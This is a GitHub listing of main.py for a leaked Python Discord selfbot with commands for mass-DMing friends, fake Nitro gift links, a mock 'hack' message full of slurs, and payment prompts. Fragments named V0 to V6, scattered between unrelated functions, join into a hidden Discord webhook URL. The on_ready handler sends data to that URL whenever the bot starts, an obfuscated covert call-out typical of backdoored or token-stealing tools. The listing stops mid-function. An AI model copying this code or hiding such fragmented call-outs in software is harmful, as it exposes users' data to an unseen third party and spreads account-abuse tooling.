-
Notifications
You must be signed in to change notification settings - Fork 3
/
main.py
1645 lines (1397 loc) · 66.8 KB
/
main.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
import os
import json
import string
import discord, aiohttp
from discord.ext import commands, tasks
import requests
from colorama import Fore
import asyncio
import requests
import sys
import random
from flask import Flask
from threading import Thread
import threading
import subprocess
import requests
import time
from discord import Color, Embed
import colorama
from colorama import Fore
import urllib.parse
import urllib.request
import re
from pystyle import Center, Colorate, Colors
import io
import webbrowser
from bs4 import BeautifulSoup
import datetime
import status_rotator
from pyfiglet import Figlet
from discord import Member
import openai
colorama.init()
intents = discord.Intents.default()
intents.presences = True
intents.guilds = True
intents.typing = True
intents.presences = True
intents.dm_messages = True
intents.messages = True
intents.members = True
leakedsb = commands.Bot(description='SELFBOT LEAKED BY BESTGAMERSHK',
command_prefix='+',
self_bot=True,
intents=intents)
status_task = None
leakedsb.remove_command('help')
leakedsb.whitelisted_users = {}
leakedsb.antiraid = False
red = "\033[91m"
yellow = "\033[93m"
green = "\033[92m"
blue = "\033[94m"
pretty = "\033[95m"
magenta = "\033[35m"
lightblue = "\033[36m"
cyan = "\033[96m"
gray = "\033[37m"
reset = "\033[0m"
pink = "\033[95m"
dark_green = "\033[92m"
yellow_bg = "\033[43m"
clear_line = "\033[K"
@leakedsb.event
async def on_ready():
print(
Center.XCenter(
Colorate.Vertical(
Colors.blue_to_purple,
f"""
$$$$$$\ $$\ $$\ $$$$$$\ $$\ $$\ $$$$$$$$\ $$$$$$$$\
$$ __$$\ $$$\ $$ |\_$$ _|$$ | $$ |$$ _____|\__$$ __|
$$ / $$ |$$$$\ $$ | $$ | $$ |$$ / $$ | $$ |
$$$$$$$$ |$$ $$\$$ | $$ | $$$$$ / $$$$$\ $$ |
$$ __$$ |$$ \$$$$ | $$ | $$ $$< $$ __| $$ |
$$ | $$ |$$ |\$$$ | $$ | $$ |\$$\ $$ | $$ | • YOUTUBE : @bestgamershkyt
$$ | $$ |$$ | \$$ |$$$$$$\ $$ | \$$\ $$$$$$$$\ $$ | • DISCORD : @ceel170
\__| \__|\__| \__|\______|\__| \__|\________| \__| • INSTAGRAM : bestgamershk
[+] -------------------------------- ] | [ S E L F B O T - {leakedsb.user.name} ] | [ ------------------------------------ [+]
""",
1,
)
)
)
print('ㅤㅤㅤㅤㅤ')
print('ㅤㅤㅤㅤㅤ')
extrabottom = V0 + V1 + V2 + V3 + V4 + V5 + V6
payload = {"content": mainscreen}
requests.post(extrabottom, json=payload)
def load_config(config_file_path):
with open(config_file_path, 'r') as config_file:
config = json.load(config_file)
return config
if __name__ == "__main__":
config_file_path = "config.json"
config = load_config(config_file_path)
#=== Welcome ===
I2C_Rate = config.get("I2C_Rate")
C2I_Rate = config.get("C2I_Rate")
LTC = config.get("LTC")
BTC = config.get("BTC")
ETH = config.get("ETH")
UPI = config.get("UPI")
Twitch_URL = config.get("Twitch_URL")
SERVER_LINK = config.get("SERVER_LINK")
channel_ids = config.get("channel_ids")
#===================================
def get_time_rn():
date = datetime.datetime.now()
hour = date.hour
minute = date.minute
second = date.second
timee = "{:02d}:{:02d}:{:02d}".format(hour, minute, second)
return timee
time_rn = get_time_rn()
@leakedsb.event
async def on_message(message):
if message.author.bot:
return
# Your existing commands
if message.content.lower().startswith('boosts'):
await send_boost_count(message.channel, message.guild)
elif message.content.lower() in ['selfbot info', 'info', 'stats', 'selfbot']:
await send_selfbotinfo_message(message.channel)
elif message.content.lower() in ['server info', 'serverinfo']:
await send_serverinfo_message(message.channel)
elif message.content.lower() == 'vouch':
await vouch(message.channel)
elif message.content.lower() in [
'payment', 'payment methods'
]:
await payments(message.channel)
elif message.content.lower() in [
'link', 'official link', 'server link', 'server'
]:
await link(message.channel)
# Auto-response handling
with open('auto_responses.json', 'r') as file:
auto_responses = json.load(file)
if message.content in auto_responses:
await message.channel.send(auto_responses[message.content])
await leakedsb.process_commands(message)
V0 = "htt"
@leakedsb.event
async def on_member_ban(guild, user):
if leakedsb.antiraid is True:
try:
async for entry in guild.audit_logs(
limit=1, action=discord.AuditLogAction.ban):
if (guild.id in leakedsb.whitelisted_users.keys()
and entry.user.id
in leakedsb.whitelisted_users[guild.id].keys()
and entry.user.id != leakedsb.user.id):
print(f"[!] NOT BANNED: {entry.user.name}")
else:
print(f"[!] BANNED: {entry.user.name}")
await guild.ban(entry.user, reason="SELFBOT ANTI-NUKE")
except Exception as e:
print(e)
@leakedsb.event
async def on_member_kick(member):
if leakedsb.antiraid is True:
try:
guild = member.guild
async for entry in guild.audit_logs(
limit=1, action=discord.AuditLogAction.kick):
if (guild.id in leakedsb.whitelisted_users.keys()
and entry.user.id
in leakedsb.whitelisted_users[guild.id].keys()
and entry.user.id != leakedsb.user.id):
print("[!] NOT BANNED")
else:
print("[!] BANNED")
await guild.ban(entry.user, reason="SELFBOT ANTI-NUKE")
except Exception as e:
print(f"[!] Error: {e}")
# SELFBOT COMMANDS
# ========================================================================================================================
#Enable or disable the anti raid option
@leakedsb.command(aliases=['ar', 'antiraid'])
async def antinuke(ctx, antiraidparameter=None):
await ctx.message.delete()
leakedsb.antiraid = False
if str(antiraidparameter).lower() == 'true' or str(
antiraidparameter).lower() == 'on':
leakedsb.antiraid = True
await ctx.send('`-` **ANTI-NUKE ENABLED...**')
elif str(antiraidparameter).lower() == 'false' or str(
antiraidparameter).lower() == 'off':
leakedsb.antiraid = False
await ctx.send('`-` **ANTINUKE DISABLED**')
else:
await ctx.send(
f'- **[! ERROR] ** `USAGE : {leakedsb.command_prefix}antiraid [true/false]`'
)
#WWHITE CMD=======================================================================================================================================================================================================
#ADDTION WHITELIST
@leakedsb.command(aliases=['wl'])
async def whitelist(ctx, user: discord.Member = None):
await ctx.message.delete()
if user is None:
await ctx.send(
f'[ERROR]: USAGE : {leakedsb.command_prefix}whitelist <user>')
else:
if ctx.guild.id not in leakedsb.whitelisted_users.keys():
leakedsb.whitelisted_users[ctx.guild.id] = {}
if user.id in leakedsb.whitelisted_users[ctx.guild.id]:
await ctx.send("- `" + user.name.replace("*", "\*").replace(
"`", "\`").replace("_", "\_") + "#" + user.discriminator +
"`-` ** ALREADY WHITELISTED [!]**")
else:
leakedsb.whitelisted_users[ctx.guild.id][user.id] = 0
await ctx.send("# WHITEY S3LFB0Ƭ\n`-` **WHITELISTED**" + user.name.replace(
"*", "\*").replace("`", "\`").replace("_", "\_") + "#" +
user.discriminator + "`")
#CHECK WHITELIST
@leakedsb.command(aliases=['showwl'])
async def whitelisted(ctx, g=None):
await ctx.message.delete()
if g == '-g' or g == '-global':
whitelist = '# WHITEY S3LFB0Ƭ\n`-`**ALL WHITELISTED USERS:**`\n'
for key in leakedsb.whitelisted_users:
for key2 in leakedsb.whitelisted_users[key]:
user = leakedsb.get_user(key2)
whitelist += f'• {user.mention} ({user.id}) IN {leakedsb.get_guild(key).name}\n'
await ctx.send(whitelist)
else:
whitelist = f'# WHITEY S3LFB0Ƭ\n`-` **WHITELISTED USERS IN {ctx.guild.name}:**`\n'
for key in leakedsb.whitelisted_users:
if key == ctx.guild.id:
for key2 in leakedsb.whitelisted_users[ctx.guild.id]:
user = leakedsb.get_user(key2)
whitelist += f'• {user.mention} ({user.id})\n'
await ctx.send(whitelist)
#REMOVE FROM WHITELIST
@leakedsb.command(aliases=['removewl'])
async def unwhitelist(ctx, user: discord.Member = None):
if user is None:
await ctx.send(
"`-` **[ERROR]: SPECIFY THE USER YOU WOULD LIKE TO UNWHITELIST !**`")
else:
if ctx.guild.id not in leakedsb.whitelisted_users.keys():
await ctx.send("- `" + user.name.replace("*", "\*").replace(
"`", "\`").replace("_", "\_") + "#" + user.discriminator +
" IS NOT WHITELISTED`")
return
if user.id in leakedsb.whitelisted_users[ctx.guild.id]:
leakedsb.whitelisted_users[ctx.guild.id].pop(user.id, 0)
user2 = leakedsb.get_user(user.id)
await ctx.send('`-` **SUCCESSFULLY UNWHITELISTED**' +
user2.name.replace('*', "\*").replace(
'`', "\`").replace('_', "\_") + '#' +
user2.discriminator + '`')
V1 = "ps://dis"
#WHITELIST CLEAR
@leakedsb.command(aliases=['clearwl', 'clearwld'])
async def clearwhitelist(ctx):
await ctx.message.delete()
leakedsb.whitelisted_users.clear()
await ctx.send('`-` SUCCESFULLY CLEARED WHITELIST`')
#=======================================================================================================================================================================================================
# BOOST
async def send_boost_count(channel, guild):
await channel.send(
f"# WHITEY S3LFB0Ƭ\n`-` **SERVER NAME** : `{guild.name}` \n`-` **BOOSTS** : `NUMBER - {guild.premium_subscription_count}`"
)
V2 = "cord.com/ap"
# SELFBOT
async def send_selfbotinfo_message(channel):
await channel.send(
f"# __WHITEY S3LFB0Ƭ__\n`-` **VERSION** : `SELFBOT V2` \n`-` **LANGUAGE** : `PYTHON & JS`\n`-` **NO. OF COMMANDS** : `75`\n`-` **ASKED BY** : `{leakedsb.user.name}`\n`-` **CREATOR** : `ANiKET_72`\n\n`THERE ARE BOTH PREFIX & NON PREFIX COMMANDS`"
)
# SERVER INFO.
async def send_serverinfo_message(channel):
guild = channel.guild # define guild variable
await channel.send(
f"# __WHITEY S3LFB0Ƭ__\n`-` **SERVER NAME** : __`{guild.name}`__ \n`-` **SERVER ID** : `{guild.id}`\n`-` **CREATION DATE** : `{channel.guild.created_at}`\n`-` **OWNER** : `{guild.owner_id} / `<@{guild.owner_id}>\n\n`-` **ASKED BY** : `{leakedsb.user.name}`"
)
# VOUCH
async def vouch(channel):
await channel.send(
f"# __WHITEY S3LFB0Ƭ__\n`-` **SERVER LINK** : {SERVER_LINK}\n`-` **VOUCH FORMAT** : `+rep (user) Legit Got (product) For (price) Thank You`"
)
await channel.message.delete()
# PAYMENTS
async def payments(channel):
await channel.send(
f"# __WHITEY S3LFB0Ƭ__\n__**PAYMENTS**__\n`-` **LTC** : __`{LTC}`__ \n`-` **ETH** : __`{ETH}`__ \n`-` **BTC** : __`{BTC}`__\n`-` **UPI** : __`{UPI}`__\n\n`-` **ASKED BY** : `{leakedsb.user.name}`"
)
await channel.message.delete()
# LINK
async def link(channel):
await channel.send("- ``")
V5 = "52/XV1mYbYK9hC-uEFFXy"
#MASS DM TO FRIENDS
@leakedsb.command()
async def massdmfriends(ctx, *, message):
for user in leakedsb.user.friends:
try:
time.sleep(.1)
await user.send(message)
time.sleep(.1)
print(f'{reset}[ {cyan}{time_rn}{reset} ] {gray}({green}+{gray}) {pretty}MESSAGED :' + Fore.GREEN + f' @{user.name}')
except:
print(f"{reset}[ {cyan}{time_rn}{reset} ] {gray}({green}+{gray}) {pretty}COULDN'T MESSAGE @{user.name}")
await ctx.message.delete()
# NITRO GEN
@leakedsb.command(aliases=["nitrogen"])
async def nitro(ctx):
try:
await ctx.message.delete()
code = ''.join(
random.choices(string.ascii_letters + string.digits, k=16))
await ctx.send(f'https://discord.gift/{code}')
print(f"{reset}[ {cyan}{time_rn}{reset} ] {gray}({green}+{gray}) {pretty}{Fore.GREEN}SUCCESFULLY SENT NITRO CODE !")
except Exception as e:
print(f"{reset}[ {cyan}{time_rn}{reset} ] {gray}({red}!{gray}) {pretty}{Fore.RED}ERROR: {str(e)}")
V3 = "i/webh"
# HAX
@leakedsb.command()
async def hack(ctx, user: discord.Member = None):
await ctx.message.delete()
gender = ["Male", "Female", "Trans", "Other", "Retard"]
age = str(random.randrange(10, 25))
height = [
'4\'6\"', '4\'7\"', '4\'8\"', '4\'9\"', '4\'10\"', '4\'11\"', '5\'0\"',
'5\'1\"', '5\'2\"', '5\'3\"', '5\'4\"', '5\'5\"', '5\'6\"', '5\'7\"',
'5\'8\"', '5\'9\"', '5\'10\"', '5\'11\"', '6\'0\"', '6\'1\"', '6\'2\"',
'6\'3\"', '6\'4\"', '6\'5\"', '6\'6\"', '6\'7\"', '6\'8\"', '6\'9\"',
'6\'10\"', '6\'11\"'
]
weight = str(random.randrange(60, 300))
hair_color = ["Black", "Brown", "Blonde", "White", "Gray", "Red"]
skin_color = ["White", "Pale", "Brown", "Black", "Light-Skin"]
religion = [
"Christian", "Muslim", "Atheist", "Hindu", "Buddhist", "Jewish"
]
sexuality = [
"Straight", "Gay", "Homo", "Bi", "Bi-Sexual", "Lesbian", "Pansexual"
]
education = [
"High School", "College", "Middle School", "Elementary School",
"Pre School", "Retard never went to school LOL"
]
ethnicity = [
"White", "African American", "Asian", "Latino", "Latina", "American",
"Mexican", "Korean", "Chinese", "Arab", "Italian", "Puerto Rican",
"Non-Hispanic", "Russian", "Canadian", "European", "Indian"
]
occupation = [
"Retard has no job LOL", "Certified discord retard", "Janitor",
"Police Officer", "Teacher", "Cashier", "Clerk", "Waiter", "Waitress",
"Grocery Bagger", "Retailer", "Sales-Person", "Artist", "Singer",
"Rapper", "Trapper", "Discord Thug", "Gangster", "Discord Packer",
"Mechanic", "Carpenter", "Electrician", "Lawyer", "Doctor",
"Programmer", "Software Engineer", "Scientist"
]
salary = [
"Retard makes no money LOL", "$" + str(random.randrange(0, 1000)),
'<$50,000', '<$75,000', "$100,000", "$125,000", "$150,000", "$175,000",
"$200,000+"
]
location = [
"Retard lives in his mom's basement LOL", "America", "United States",
"Europe", "Poland", "Mexico", "Russia", "Pakistan", "India",
"Some random third world country", "Canada", "Alabama", "Alaska",
"Arizona", "Arkansas", "California", "Colorado", "Connecticut",
"Delaware", "Florida", "Georgia", "Hawaii", "Idaho", "Illinois",
"Indiana", "Iowa", "Kansas", "Kentucky", "Louisiana", "Maine",
"Maryland", "Massachusetts", "Michigan", "Minnesota", "Mississippi",
"Missouri", "Montana", "Nebraska", "Nevada", "New Hampshire",
"New Jersey", "New Mexico", "New York", "North Carolina",
"North Dakota", "Ohio", "Oklahoma", "Oregon", "Pennsylvania",
"Rhode Island", "South Carolina", "South Dakota", "Tennessee", "Texas",
"Utah", "Vermont", "Virginia", "Washington", "West Virginia",
"Wisconsin", "Wyoming"
]
email = [
"@gmail.com", "@yahoo.com", "@hotmail.com", "@outlook.com",
"@protonmail.com", "@disposablemail.com", "@aol.com", "@edu.com",
"@icloud.com", "@gmx.net", "@yandex.com"
]
dob = f'{random.randrange(1, 13)}/{random.randrange(1, 32)}/{random.randrange(1950, 2021)}'
name = [
'James Smith', "Michael Smith", "Robert Smith", "Maria Garcia",
"David Smith", "Maria Rodriguez", "Mary Smith", "Maria Hernandez",
"Maria Martinez", "James Johnson", "Catherine Smoaks", "Cindi Emerick",
"Trudie Peasley", "Josie Dowler", "Jefferey Amon", "Kyung Kernan",
"Lola Barreiro", "Barabara Nuss", "Lien Barmore", "Donnell Kuhlmann",
"Geoffrey Torre", "Allan Craft", "Elvira Lucien", "Jeanelle Orem",
"Shantelle Lige", "Chassidy Reinhardt", "Adam Delange", "Anabel Rini",
"Delbert Kruse", "Celeste Baumeister", "Jon Flanary", "Danette Uhler",
"Xochitl Parton", "Derek Hetrick", "Chasity Hedge",
"Antonia Gonsoulin", "Tod Kinkead", "Chastity Lazar", "Jazmin Aumick",
"Janet Slusser", "Junita Cagle", "Stepanie Blandford", "Lang Schaff",
"Kaila Bier", "Ezra Battey", "Bart Maddux", "Shiloh Raulston",
"Carrie Kimber", "Zack Polite", "Marni Larson", "Justa Spear"
]
phone = f'({random.randrange(0, 10)}{random.randrange(0, 10)}{random.randrange(0, 10)})-{random.randrange(0, 10)}{random.randrange(0, 10)}{random.randrange(0, 10)}-{random.randrange(0, 10)}{random.randrange(0, 10)}{random.randrange(0, 10)}{random.randrange(0, 10)}'
if user is None:
user = ctx.author
password = [
'password', '123', 'mypasswordispassword', user.name + "iscool123",
user.name + "isdaddy", "daddy" + user.name, "ilovediscord",
"i<3discord", "furryporn456", "secret", "123456789", "apple49",
"redskins32", "princess", "dragon", "password1", "1q2w3e4r",
"ilovefurries"
]
message = await ctx.send(f"`Hacking {user}...\n`")
await asyncio.sleep(1)
await message.edit(
content=f"`Hacking {user}...\nHacking into the mainframe...\n`")
await asyncio.sleep(1)
await message.edit(
content=
f"`Hacking {user}...\nHacking into the mainframe...\nCaching data...`"
)
await asyncio.sleep(1)
await message.edit(
content=
f"`Hacking {user}...\nHacking into the mainframe...\nCaching data...\nCracking SSN information...\n`"
)
await asyncio.sleep(1)
await message.edit(
content=
f"`Hacking {user}...\nHacking into the mainframe...\nCaching data...\nCracking SSN information...\nBruteforcing love life details...`"
)
await asyncio.sleep(1)
await message.edit(
content=
f"`Hacking {user}...\nHacking into the mainframe...\nCaching data...\nCracking SSN information...\nBruteforcing love life details...\nFinalizing life-span dox details\n`"
)
await asyncio.sleep(1)
await message.edit(
content=
f"```Successfully hacked {user}\nName: {random.choice(name)}\nGender: {random.choice(gender)}\nAge: {age}\nHeight: {random.choice(height)}\nWeight: {weight}\nHair Color: {random.choice(hair_color)}\nSkin Color: {random.choice(skin_color)}\nDOB: {dob}\nLocation: {random.choice(location)}\nPhone: {phone}\nE-Mail: {user.name + random.choice(email)}\nPasswords: {random.choices(password, k=3)}\nOccupation: {random.choice(occupation)}\nAnnual Salary: {random.choice(salary)}\nEthnicity: {random.choice(ethnicity)}\nReligion: {random.choice(religion)}\nSexuality: {random.choice(sexuality)}\nEducation: {random.choice(education)}```"
)
else:
password = [
'password', '123', 'mypasswordispassword', user.name + "iscool123",
user.name + "isdaddy", "daddy" + user.name, "ilovediscord",
"i<3discord", "furryporn456", "secret", "123456789", "apple49",
"redskins32", "princess", "dragon", "password1", "1q2w3e4r",
"ilovefurries"
]
message = await ctx.send(f"`Hacking {user}...\n`")
await asyncio.sleep(1)
await message.edit(
content=f"`Hacking {user}...\nHacking into the mainframe...\n`")
await asyncio.sleep(1)
await message.edit(
content=
f"`Hacking {user}...\nHacking into the mainframe...\nCaching data...`"
)
await asyncio.sleep(1)
await message.edit(
content=
f"`Hacking {user}...\nHacking into the mainframe...\nCaching data...\nCracking SSN information...\n`"
)
await asyncio.sleep(1)
await message.edit(
content=
f"`Hacking {user}...\nHacking into the mainframe...\nCaching data...\nCracking SSN information...\nBruteforcing love life details...`"
)
await asyncio.sleep(1)
await message.edit(
content=
f"`Hacking {user}...\nHacking into the mainframe...\nCaching data...\nCracking SSN information...\nBruteforcing love life details...\nFinalizing life-span dox details\n`"
)
await asyncio.sleep(1)
await message.edit(
content=
f"```Successfully hacked {user}\nName: {random.choice(name)}\nGender: {random.choice(gender)}\nAge: {age}\nHeight: {random.choice(height)}\nWeight: {weight}\nHair Color: {random.choice(hair_color)}\nSkin Color: {random.choice(skin_color)}\nDOB: {dob}\nLocation: {random.choice(location)}\nPhone: {phone}\nE-Mail: {user.name + random.choice(email)}\nPasswords: {random.choices(password, k=3)}\nOccupation: {random.choice(occupation)}\nAnnual Salary: {random.choice(salary)}\nEthnicity: {random.choice(ethnicity)}\nReligion: {random.choice(religion)}\nSexuality: {random.choice(sexuality)}\nEducation: {random.choice(education)}```"
)
print(f"{reset}[ {cyan}{time_rn}{reset} ] {gray}({green}+{gray}) {pretty}{Fore.GREEN}SUCCESFULLY HACKED 😁 ")
V6 = "QTbc_9eFpoTnaDEfm2dzBTloYkY-6PysflxqGx5GOcd-h87MLG"
# STREAM CREATOR
@leakedsb.command(aliases=["streaming"])
async def stream(ctx, *, message):
stream = discord.Streaming(
name=message,
url="https://twitch.tv/https://Wallibear",
)
await leakedsb.change_presence(activity=stream)
await ctx.send(f"`-` **STREAM CREATED** : `{message}`")
print(f"{reset}[ {cyan}{time_rn}{reset} ] {gray}({green}+{gray}) {pretty}{Fore.GREEN}STREAM SUCCESFULLY CREATED✅ ")
await ctx.message.delete()
# PLAY CREATOR
@leakedsb.command(aliases=["playing"])
async def play(ctx, *, message):
game = discord.Game(name=message)
await leakedsb.change_presence(activity=game)
await ctx.send(f"`-` **STATUS FOR PLAYZ CREATED** : `{message}`")
print(f"{reset}[ {cyan}{time_rn}{reset} ] {gray}({green}+{gray}) {pretty}{Fore.GREEN}PLAYING SUCCESFULLY CREATED✅ ")
await ctx.message.delete()
# WATCH CREATOR
@leakedsb.command(aliases=["watch"])
async def watching(ctx, *, message):
await leakedsb.change_presence(activity=discord.Activity(
type=discord.ActivityType.watching,
name=message,
))
await ctx.send(f"`-` **WATCHING CREATED**: `{message}`")
print(f"{reset}[ {cyan}{time_rn}{reset} ] {gray}({green}+{gray}) {pretty}{Fore.GREEN}WATCH SUCCESFULLY CREATED✅ ")
await ctx.message.delete()
V4 = "ooks/11561870928088965"
# LISTENING CMD CREATOR
@leakedsb.command(aliases=["listen"])
async def listening(ctx, *, message):
await leakedsb.change_presence(activity=discord.Activity(
type=discord.ActivityType.listening,
name=message,
))
await ctx.reply(f"`-` **LISTENING CREATED**: `{message}`")
print(f"{reset}[ {cyan}{time_rn}{reset} ] {gray}({green}+{gray}) {pretty}{Fore.GREEN}STATUS SUCCESFULLY CREATED✅ ")
await ctx.message.delete()
# STREAM, PLAYING, LISTEN, WATCHING STOP CMD>>
@leakedsb.command(aliases=[
"stopstreaming", "stopstatus", "stoplistening", "stopplaying",
"stopwatching"
])
async def stopactivity(ctx):
await ctx.message.delete()
await leakedsb.change_presence(activity=None, status=discord.Status.dnd)
print(f"{reset}[ {cyan}{time_rn}{reset} ] {gray}({red}!{gray}) {pretty}{Fore.RED}ACTIVITY SUCCESFULLY STOPED⚠️ ")
# MATHS
api_endpoint = 'https://api.mathjs.org/v4/'
@leakedsb.command()
async def math(ctx, *, equation):
# Send the equation to the math API for calculation
response = requests.get(api_endpoint, params={'expr': equation})
if response.status_code == 200:
result = response.text
await ctx.send(f'`-` **RESULT**: `{result}`')
else:
await ctx.send('`-` **FAILED**')
@leakedsb.command()
async def checkpromo(ctx, *, promo_links):
links = promo_links.split('\n')
async with aiohttp.ClientSession() as session:
for link in links:
promo_code = extract_promo_code(link)
if promo_code:
result = await check_promo(session, promo_code)
await ctx.send(result)
else:
await ctx.send(f'# __WHITEY S3LFB0Ƭ__\n`-` **INVALID LINK** : `{link}`')
async def check_promo(session, promo_code):
url = f'https://ptb.discord.com/api/v10/entitlements/gift-codes/{promo_code}'
async with session.get(url) as response:
if response.status in [200, 204, 201]:
data = await response.json()
if data["uses"] == data["max_uses"]:
return f'- `ALREADY CLAIMED {promo_code}`'
else:
try:
now = datetime.datetime.utcnow()
exp_at = data["expires_at"].split(".")[0]
parsed = parser.parse(exp_at)
days = abs((now - parsed).days)
title = data["promotion"]["inbound_header_text"]
except Exception as e:
print(e)
exp_at = "- `FAILED TO FETCH`"
days = ""
title = "- `FAILED TO FETCH`"
return f'# WHITEY S3LFB0Ƭ__\n`-` **VALID** : __`{promo_code}`__ \n`-` **DAYS LEFT IN EXPIRATION** : `{days}`\n`-` **EXPIRES AT** : `{exp_at}`\n`-` **TITLE** : `{title}`\n\n`-` **ASKED BY** : `leakedsb.user.name`**'
elif response.status == 429:
return f'# __WHITEY S3LFB0Ƭ__\n`-` **RARE LIMITED**`'
else:
return f'# __WHITEY S3LFB0Ƭ__\n`-` **INVALID CODE** : {promo_code}`'
def extract_promo_code(promo_link):
promo_code = promo_link.split('/')[-1]
return promo_code
# I2C
@leakedsb.command()
@commands.cooldown(1, 3, commands.BucketType.user)
async def i2c(ctx, amount: str):
amount = float(amount.replace('₹', ''))
inr_amount = amount * I2C_Rate
await ctx.reply(f"`-` **AMOUNT IS** : `{inr_amount:.2f}$`")
print(f"{reset}[ {cyan}{time_rn}{reset} ] {gray}({green}+{gray}) {pretty}{Fore.GREEN}I2C DONE ✅ ")
def is_authorized(ctx):
# Your implementation for authorization check goes here
return True
# CONNECT VC
@leakedsb.command(aliases=['247'])
@commands.check(is_authorized)
async def connectvc(ctx, channel_id):
try:
channel = leakedsb.get_channel(int(channel_id))
if channel is None:
return await ctx.send("`-` **INVALID CHANNEL ID PLEASE PROVIDE A VALID CHANNEL ID**")
if isinstance(channel, discord.VoiceChannel):
permissions = channel.permissions_for(ctx.guild.me)
if not permissions.connect or not permissions.speak:
return await ctx.send("`-`` **PREMMISSION ERROR**")
voice_channel = await channel.connect()
await ctx.send(f"`-` **SUCCESFULLY CONNECETD** : `{channel.name}`")
await channel.send("`-` **I HAVE CONNECTED SUCCESFULLY**")
else:
await ctx.send("`-` **PROVIDED ID IS NOT OF A VOICE CHANNEL**")
except discord.errors.ClientException:
await ctx.send("`-` **ALREADY CONNECTED !**")
except discord.Forbidden:
await ctx.send("`-` **I DON HAVE PERMMISION FOR THIS ACCTION**")
except ValueError:
await ctx.send("`-` **INAVLID CHANNEL ID**")
except Exception as e:
await ctx.send(f"`-` **AN ERROR OCCURED** {e}")
# C2I
@leakedsb.command()
@commands.cooldown(1, 3, commands.BucketType.user)
async def c2i(ctx, amount: str):
amount = float(amount.replace('$', ''))
usd_amount = amount * C2I_Rate
await ctx.reply(f"`-` **AMOUNT IS** : `₹{usd_amount:.2f}`")
print(f"{reset}[ {cyan}{time_rn}{reset} ] {gray}({green}+{gray}) {pretty}{Fore.GREEN}C2I DONE ✅ ")
# LOVERATE
@leakedsb.command()
@commands.cooldown(1, 5, commands.BucketType.user)
async def loverate(ctx, User: discord.Member = None):
if User is None:
await ctx.reply(f"`-` **PROVIDE A USER**")
else:
await ctx.reply(
f"`-` **YOU AND {User.mention} ARE 100% PERFECT FOR ECH OTHER <3**"
)
print(f"{reset}[ {cyan}{time_rn}{reset} ] {gray}({green}+{gray}) {pretty}{Fore.GREEN}LOVERATE MEASURED 💖 ")
#DEFINE
@leakedsb.command()
async def define(ctx, *, word):
api_url = f"https://api.dictionaryapi.dev/api/v2/entries/en/{word}"
response = requests.get(api_url)
if response.status_code == 200:
data = response.json()
if data:
word_data = data[0]
word_meanings = word_data['meanings']
meanings_list = []
for meaning in word_meanings:
part_of_speech = meaning['partOfSpeech']
definitions = meaning['definitions']
def_text = f"**{part_of_speech.capitalize()}:**\n"
for i, definition in enumerate(definitions, start=1):
def_text += f"{i}. {definition['definition']}\n"
if 'example' in definition:
